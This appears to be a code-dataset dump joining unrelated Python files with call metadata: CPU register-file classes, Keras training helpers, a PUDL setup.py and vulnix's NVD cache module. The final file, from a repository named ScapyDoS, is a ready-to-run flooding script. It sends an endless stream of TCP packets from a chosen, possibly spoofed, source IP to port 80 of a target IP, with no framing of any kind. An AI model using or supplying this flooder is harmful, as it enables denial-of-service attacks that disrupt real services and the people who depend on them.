class X86_64_RegisterFile(RegisterFile):
registers = {
"G": # general purpose registers
[
# {"64": "rax", "32": "eax", "repr": "rax"},
# {"64": "rcx", "32": "ecx", "repr": "rcx"},
# {"64": "rdx", "32": "edx", "repr": "rdx"},
{"64": "rbx", "32": "ebx", "repr": "rbx"}, # used by gcc
# {"64": "rsp", "32": "esp", "repr": "rsp"}, # used by gcc
# {"64": "rbp", "32": "ebp", "repr": "rbp"}, # used by gcc
{"64": "rsi", "32": "esi", "repr": "rsi"}, # used for string instructions
{"64": "rdi", "32": "edi", "repr": "rdi"}, # used for string instructions
{"64": "r8", "32": "r8d", "repr": "r8"},
{"64": "r9", "32": "r9d", "repr": "r9"},
{"64": "r10", "32": "r10d", "repr": "r10"},
{"64": "r11", "32": "r11d", "repr": "r11"},
{"64": "r12", "32": "r12d", "repr": "r12"},
# {"64": "r13", "32": "r13d", "repr": "r13"}, # used as divisor register
# {"64": "r14", "32": "r14d", "repr": "r14"}, # used as memory register
# {"64": "r15", "32": "r15d", "repr": "r15"}, # used by program frame
],
"V": # vector registers
[
{"256": "ymm0", "128": "xmm0", "repr": "ymm0"},
{"256": "ymm1", "128": "xmm1", "repr": "ymm1"},
{"256": "ymm2", "128": "xmm2", "repr": "ymm2"},
{"256": "ymm3", "128": "xmm3", "repr": "ymm3"},
{"256": "ymm4", "128": "xmm4", "repr": "ymm4"},
{"256": "ymm5", "128": "xmm5", "repr": "ymm5"},
{"256": "ymm6", "128": "xmm6", "repr": "ymm6"},
{"256": "ymm7", "128": "xmm7", "repr": "ymm7"},
{"256": "ymm8", "128": "xmm8", "repr": "ymm8"},
{"256": "ymm9", "128": "xmm9", "repr": "ymm9"},
{"256": "ymm10", "128": "xmm10", "repr": "ymm10"},
{"256": "ymm11", "128": "xmm11", "repr": "ymm11"},
{"256": "ymm12", "128": "xmm12", "repr": "ymm12"},
{"256": "ymm13", "128": "xmm13", "repr": "ymm13"},
{"256": "ymm14", "128": "xmm14", "repr": "ymm14"},
{"256": "ymm15", "128": "xmm15", "repr": "ymm15"},
],
"DIV": # register for non-zero divisor
[
{"64": "r13", "32": "r13d", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "r14", "32": "r14d", "repr": None}
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
class AArch64_RegisterFile(RegisterFile):
registers = {
"G": # general puprose registers
[
# {"64": "x0", "32": "w0", "repr": "x0"}, # used for frame
# {"64": "x1", "32": "w1", "repr": "x1"}, # used for frame
{"64": "x2", "32": "w2", "repr": "x2"},
{"64": "x3", "32": "w3", "repr": "x3"},
{"64": "x4", "32": "w4", "repr": "x4"},
{"64": "x5", "32": "w5", "repr": "x5"},
{"64": "x6", "32": "w6", "repr": "x6"},
{"64": "x7", "32": "w7", "repr": "x7"},
{"64": "x8", "32": "w8", "repr": "x8"},
{"64": "x9", "32": "w9", "repr": "x9"},
{"64": "x10", "32": "w10", "repr": "x10"},
{"64": "x11", "32": "w11", "repr": "x11"},
{"64": "x12", "32": "w12", "repr": "x12"},
{"64": "x13", "32": "w13", "repr": "x13"},
{"64": "x14", "32": "w14", "repr": "x14"},
{"64": "x15", "32": "w15", "repr": "x15"},
{"64": "x16", "32": "w16", "repr": "x16"},
{"64": "x17", "32": "w17", "repr": "x17"},
{"64": "x18", "32": "w18", "repr": "x18"},
{"64": "x19", "32": "w19", "repr": "x19"},
{"64": "x20", "32": "w20", "repr": "x20"},
{"64": "x21", "32": "w21", "repr": "x21"},
{"64": "x22", "32": "w22", "repr": "x22"},
{"64": "x23", "32": "w23", "repr": "x23"},
{"64": "x24", "32": "w24", "repr": "x24"},
{"64": "x25", "32": "w25", "repr": "x25"},
{"64": "x26", "32": "w26", "repr": "x26"},
{"64": "x27", "32": "w27", "repr": "x27"},
# {"64": "x28", "32": "w28", "repr": "x28"}, # used for memory
# {"64": "x29", "32": "w29", "repr": "x29"}, # used for divisor
# {"64": "x30", "32": "w30", "repr": "x30"}, # link register
# {"64": "x31", "32": "w31", "repr": "x31"}, # zero/sp register
],
"F": # vector/floating point registers
[
{"VEC": "v0", "128": "q0", "64": "d0", "32": "s0", "16": "h0", "8": "b0", "repr": "v0"},
{"VEC": "v1", "128": "q1", "64": "d1", "32": "s1", "16": "h1", "8": "b1", "repr": "v1"},
{"VEC": "v2", "128": "q2", "64": "d2", "32": "s2", "16": "h2", "8": "b2", "repr": "v2"},
{"VEC": "v3", "128": "q3", "64": "d3", "32": "s3", "16": "h3", "8": "b3", "repr": "v3"},
{"VEC": "v4", "128": "q4", "64": "d4", "32": "s4", "16": "h4", "8": "b4", "repr": "v4"},
{"VEC": "v5", "128": "q5", "64": "d5", "32": "s5", "16": "h5", "8": "b5", "repr": "v5"},
{"VEC": "v6", "128": "q6", "64": "d6", "32": "s6", "16": "h6", "8": "b6", "repr": "v6"},
{"VEC": "v7", "128": "q7", "64": "d7", "32": "s7", "16": "h7", "8": "b7", "repr": "v7"},
{"VEC": "v8", "128": "q8", "64": "d8", "32": "s8", "16": "h8", "8": "b8", "repr": "v8"},
{"VEC": "v9", "128": "q9", "64": "d9", "32": "s9", "16": "h9", "8": "b9", "repr": "v9"},
{"VEC": "v10", "128": "q10", "64": "d10", "32": "s10", "16": "h10", "8": "b10", "repr": "v10"},
{"VEC": "v11", "128": "q11", "64": "d11", "32": "s11", "16": "h11", "8": "b11", "repr": "v11"},
{"VEC": "v12", "128": "q12", "64": "d12", "32": "s12", "16": "h12", "8": "b12", "repr": "v12"},
{"VEC": "v13", "128": "q13", "64": "d13", "32": "s13", "16": "h13", "8": "b13", "repr": "v13"},
{"VEC": "v14", "128": "q14", "64": "d14", "32": "s14", "16": "h14", "8": "b14", "repr": "v14"},
{"VEC": "v15", "128": "q15", "64": "d15", "32": "s15", "16": "h15", "8": "b15", "repr": "v15"},
{"VEC": "v16", "128": "q16", "64": "d16", "32": "s16", "16": "h16", "8": "b16", "repr": "v16"},
{"VEC": "v17", "128": "q17", "64": "d17", "32": "s17", "16": "h17", "8": "b17", "repr": "v17"},
{"VEC": "v18", "128": "q18", "64": "d18", "32": "s18", "16": "h18", "8": "b18", "repr": "v18"},
{"VEC": "v19", "128": "q19", "64": "d19", "32": "s19", "16": "h19", "8": "b19", "repr": "v19"},
{"VEC": "v20", "128": "q20", "64": "d20", "32": "s20", "16": "h20", "8": "b20", "repr": "v20"},
{"VEC": "v21", "128": "q21", "64": "d21", "32": "s21", "16": "h21", "8": "b21", "repr": "v21"},
{"VEC": "v22", "128": "q22", "64": "d22", "32": "s22", "16": "h22", "8": "b22", "repr": "v22"},
{"VEC": "v23", "128": "q23", "64": "d23", "32": "s23", "16": "h23", "8": "b23", "repr": "v23"},
{"VEC": "v24", "128": "q24", "64": "d24", "32": "s24", "16": "h24", "8": "b24", "repr": "v24"},
{"VEC": "v25", "128": "q25", "64": "d25", "32": "s25", "16": "h25", "8": "b25", "repr": "v25"},
{"VEC": "v26", "128": "q26", "64": "d26", "32": "s26", "16": "h26", "8": "b26", "repr": "v26"},
{"VEC": "v27", "128": "q27", "64": "d27", "32": "s27", "16": "h27", "8": "b27", "repr": "v27"},
{"VEC": "v28", "128": "q28", "64": "d28", "32": "s28", "16": "h28", "8": "b28", "repr": "v28"},
{"VEC": "v29", "128": "q29", "64": "d29", "32": "s29", "16": "h29", "8": "b29", "repr": "v29"},
{"VEC": "v30", "128": "q30", "64": "d30", "32": "s30", "16": "h30", "8": "b30", "repr": "v30"},
{"VEC": "v31", "128": "q31", "64": "d31", "32": "s31", "16": "h31", "8": "b31", "repr": "v31"},
],
"DIV": # register for non-zero divisor
[
{"64": "x29", "32": "w29", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
"MEM": # base register for memory operands
[
{"64": "x28", "32": "w28", "repr": None},
# no need to represent this in the clobber list as it is
# hardwired to a this register anyway
],
}
def __init__(self):
super().__init__()
| [((18, 28, 18, 49), 'collections.defaultdict', 'defaultdict', ({(18, 40, 18, 48): 'lambda : 0'}, {}), '(lambda : 0)', False, 'from collections import defaultdict\n')] |
JoseLuisRojasAranda/tfmodels | src/training_utils/training.py | 56dce0236f0cc03dd7031aecf305d470c9fb97a9 | import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Importa cosas de Keras API
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Importa callbacks del modelo
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Importa cosas para graficar el entrenameinto
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
# carga el setup del modelo
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
# carga el estado de entrenamiento
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
print("[INFO] Continuando entrenameinto de modelo.")
# carga el modelo
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
# vuelve a compilar el modelo
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
# Asegura que el path sea el correcto
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
# Borra las carpetas si ya existen
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
# crea carpeta donde se van a guardar los checkpoints
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
# Escribe el setup del entrenamiento
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
# Dibuja la arquitectura del modelo
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
# Crea optimizador, por defecto Adam
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
# Compila el modelo
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Metodo, que entrena un modelo ya compilado, implementa callbacks de
# tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre
# mejoras en el loss, tambien grafica y crea matriz de confusion
# Args:
# compiled_model: keras.Model ya compilado
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predict
def fit_model(compiled_model=None, # El modelo debe de estar complicado
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
# obtiene el dataset
train, test = dataset
# Callbacks durante entrenamiento
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
# Entrena el modelo
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
# Guarda el modelo
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
# Crea grafica del entrenamiento
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
# Crea confusion matrix
if test != None:
print("[INFO] Creando matriz de confusion")
graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
| [((45, 12, 45, 79), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', ({(45, 39, 45, 78): "path_to_model + 'checkpoints/' + model_name"}, {}), "(path_to_model + 'checkpoints/' + model_name)", True, 'import tensorflow as tf\n'), ((48, 10, 48, 41), 'tensorflow.keras.optimizers.Adam', 'Adam', (), '', False, 'from tensorflow.keras.optimizers import Adam, RMSprop\n'), ((83, 4, 84, 73), 'tensorflow.keras.utils.plot_model', 'plot_model', (), '', False, 'from tensorflow.keras.utils import plot_model\n'), ((87, 10, 87, 41), 'tensorflow.keras.optimizers.Adam', 'Adam', (), '', False, 'from tensorflow.keras.optimizers import Adam, RMSprop\n'), ((138, 4, 139, 46), 'training_utils.training_graphs.graph_model_metrics', 'graph_model_metrics', (), '', False, 'from training_utils.training_graphs import graph_model_metrics\n'), ((148, 12, 148, 57), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', ({(148, 39, 148, 56): "path + 'model.h5'"}, {}), "(path + 'model.h5')", True, 'import tensorflow as tf\n'), ((27, 11, 27, 37), 'os.path.exists', 'path.exists', ({(27, 23, 27, 36): 'path_to_model'}, {}), '(path_to_model)', False, 'from os import path\n'), ((34, 16, 34, 31), 'json.load', 'json.load', ({(34, 26, 34, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((39, 16, 39, 31), 'json.load', 'json.load', ({(39, 26, 39, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((62, 11, 62, 37), 'os.path.exists', 'path.exists', ({(62, 23, 62, 36): "setup['path']"}, {}), "(setup['path'])", False, 'from os import path\n'), ((63, 8, 63, 34), 'os.makedirs', 'os.makedirs', ({(63, 20, 63, 33): "setup['path']"}, {}), "(setup['path'])", False, 'import os\n'), ((66, 11, 66, 51), 'os.path.exists', 'path.exists', ({(66, 23, 66, 50): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'from os import path\n'), ((69, 11, 69, 44), 'os.path.exists', 'path.exists', ({(69, 23, 69, 43): "(setup['path'] + 'logs')"}, {}), "(setup['path'] + 'logs')", False, 'from os import path\n'), ((73, 11, 73, 51), 'os.path.exists', 'path.exists', ({(73, 23, 73, 50): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'from os import path\n'), ((74, 8, 74, 47), 'os.mkdir', 'os.mkdir', ({(74, 17, 74, 46): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'import os\n'), ((78, 8, 78, 42), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((125, 8, 125, 65), 'tensorflow.keras.callbacks.CSVLogger', 'CSVLogger', (), '', False, 'from tensorflow.keras.callbacks import CSVLogger, TensorBoard\n'), ((126, 8, 126, 40), 'tensorflow.keras.callbacks.TensorBoard', 'TensorBoard', (), '', False, 'from tensorflow.keras.callbacks import CSVLogger, TensorBoard\n'), ((144, 8, 145, 66), 'training_utils.training_graphs.graph_confusion_matrix', 'graph_confusion_matrix', (), '', False, 'from training_utils.training_graphs import graph_confusion_matrix\n'), ((150, 16, 150, 31), 'json.load', 'json.load', ({(150, 26, 150, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((67, 12, 67, 54), 'shutil.rmtree', 'shutil.rmtree', ({(67, 26, 67, 53): "(setup['path'] + 'checkpoints')"}, {}), "(setup['path'] + 'checkpoints')", False, 'import shutil\n'), ((70, 12, 70, 47), 'shutil.rmtree', 'shutil.rmtree', ({(70, 26, 70, 46): "(setup['path'] + 'logs')"}, {}), "(setup['path'] + 'logs')", False, 'import shutil\n')] |
truggles/pudl | setup.py | 6f41664f8243b8f7aafdbbfc8522f96043dbf561 | #!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='[email protected]',
maintainer='Zane A. Selvans',
maintainer_email='[email protected]',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
| [((33, 7, 33, 31), 'os.getenv', 'os.getenv', ({(33, 17, 33, 30): '"""READTHEDOCS"""'}, {}), "('READTHEDOCS')", False, 'import os\n'), ((57, 14, 57, 28), 'pathlib.Path', 'Path', ({(57, 19, 57, 27): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((100, 13, 100, 33), 'setuptools.find_packages', 'find_packages', ({(100, 27, 100, 32): '"""src"""'}, {}), "('src')", False, 'from setuptools import find_packages, setup\n')] |
dermetfan/vulnix | src/vulnix/nvd.py | 06daccda0e51098fbdbc65f61b6663c5c6df9358 | from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
_log.warn('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
_log.warn('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
"""Metadate for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
| [((20, 7, 20, 34), 'logging.getLogger', 'logging.getLogger', ({(20, 25, 20, 33): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((217, 18, 217, 38), 'datetime.datetime', 'datetime', ({(217, 27, 217, 31): '1970', (217, 33, 217, 34): '1', (217, 36, 217, 37): '1'}, {}), '(1970, 1, 1)', False, 'from datetime import datetime, date, timedelta\n'), ((31, 25, 31, 48), 'os.path.expanduser', 'p.expanduser', ({(31, 38, 31, 47): 'cache_dir'}, {}), '(cache_dir)', True, 'import os.path as p\n'), ((41, 8, 41, 46), 'fcntl.lockf', 'fcntl.lockf', ({(41, 20, 41, 30): 'self._lock', (41, 32, 41, 45): 'fcntl.LOCK_EX'}, {}), '(self._lock, fcntl.LOCK_EX)', False, 'import fcntl\n'), ((46, 8, 46, 50), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((81, 8, 81, 27), 'transaction.abort', 'transaction.abort', ({}, {}), '()', False, 'import transaction\n'), ((90, 33, 90, 50), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((91, 35, 91, 52), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((134, 13, 134, 30), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((141, 8, 141, 28), 'transaction.commit', 'transaction.commit', ({}, {}), '()', False, 'import transaction\n'), ((199, 14, 199, 34), 'json.loads', 'json.loads', ({(199, 25, 199, 33): 'nvd_json'}, {}), '(nvd_json)', False, 'import json\n'), ((32, 18, 32, 30), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((36, 26, 36, 56), 'os.path.join', 'p.join', ({(36, 33, 36, 47): 'self.cache_dir', (36, 49, 36, 55): '"""lock"""'}, {}), "(self.cache_dir, 'lock')", True, 'import os.path as p\n'), ((38, 12, 38, 66), 'fcntl.lockf', 'fcntl.lockf', ({(38, 24, 38, 34): 'self._lock', (38, 36, 38, 65): '(fcntl.LOCK_EX | fcntl.LOCK_NB)'}, {}), '(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)', False, 'import fcntl\n'), ((71, 12, 71, 32), 'transaction.commit', 'transaction.commit', ({}, {}), '()', False, 'import transaction\n'), ((73, 12, 73, 31), 'transaction.abort', 'transaction.abort', ({}, {}), '()', False, 'import transaction\n'), ((84, 27, 84, 61), 'os.path.join', 'p.join', ({(84, 34, 84, 48): 'self.cache_dir', (84, 50, 84, 60): '"""Data.fs*"""'}, {}), "(self.cache_dir, 'Data.fs*')", True, 'import os.path as p\n'), ((85, 12, 85, 24), 'os.unlink', 'os.unlink', ({(85, 22, 85, 23): 'f'}, {}), '(f)', False, 'import os\n'), ((122, 36, 122, 50), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((49, 12, 49, 45), 'os.path.join', 'p.join', ({(49, 19, 49, 33): 'self.cache_dir', (49, 35, 49, 44): '"""Data.fs"""'}, {}), "(self.cache_dir, 'Data.fs')", True, 'import os.path as p\n'), ((53, 46, 53, 63), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((54, 48, 54, 65), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n'), ((87, 12, 87, 45), 'os.path.join', 'p.join', ({(87, 19, 87, 33): 'self.cache_dir', (87, 35, 87, 44): '"""Data.fs"""'}, {}), "(self.cache_dir, 'Data.fs')", True, 'import os.path as p\n'), ((107, 25, 107, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((107, 42, 107, 60), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, date, timedelta\n'), ((110, 25, 110, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, date, timedelta\n'), ((110, 42, 110, 59), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, date, timedelta\n'), ((190, 23, 190, 49), 'gzip.decompress', 'gzip.decompress', ({(190, 39, 190, 48): 'r.content'}, {}), '(r.content)', False, 'import gzip\n'), ((237, 28, 237, 45), 'BTrees.OOBTree.OOBTree', 'OOBTree.OOBTree', ({}, {}), '()', False, 'from BTrees import OOBTree\n')] |
Zusyaku/Termux-And-Lali-Linux-V2 | ScapyDoS-main/simp.py | b1a1b0841d22d4bf2cc7932b72716d55f070871e | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
